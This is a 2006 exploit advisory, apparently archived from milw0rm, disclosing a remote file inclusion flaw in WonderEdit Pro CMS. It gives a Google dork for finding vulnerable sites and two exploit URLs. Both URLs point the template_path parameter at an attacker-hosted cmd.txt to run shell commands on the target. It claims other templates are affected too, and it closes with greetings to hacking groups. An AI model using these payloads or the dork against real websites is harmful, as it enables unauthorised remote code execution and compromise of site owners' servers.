--------------------------------------------------------------------------------
Title : WonderEdit Pro CMS <= Pro version Remote File Include Vulnerabilities
###############################################################################
Discovered By OLiBekaS
-----------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Web Site CMS
version : pro version
Description: this default cms for all hosting in Wonder hosting (http://www.12wonderhosting.com/) maybe :)
URL : http://www.wonderedit.com
-----------------------------------------------------------------------------
dork : "powered by WonderEdit Pro"
Exploit :
http://[target]/[path]/template/rwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[path]/template/gwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls
------------------------------------------------------------------------------
this work for all template in WonderEdit Pro CMS and use "rwb" for or "gbw" default attack, and vulner to other tempalte to like
"blues", "bluwhi", "grns", and other.
------------------------------------------------------------------------------
greatz:
~~~~~
# Special greetz to my master effex and bEdAh`oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other
-------------------------------------------------------------------------------
Contact:
~~~~~~~
Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net
--------------------------------- [ eof ] ---------------------------------------
# milw0rm.com [2006-07-04]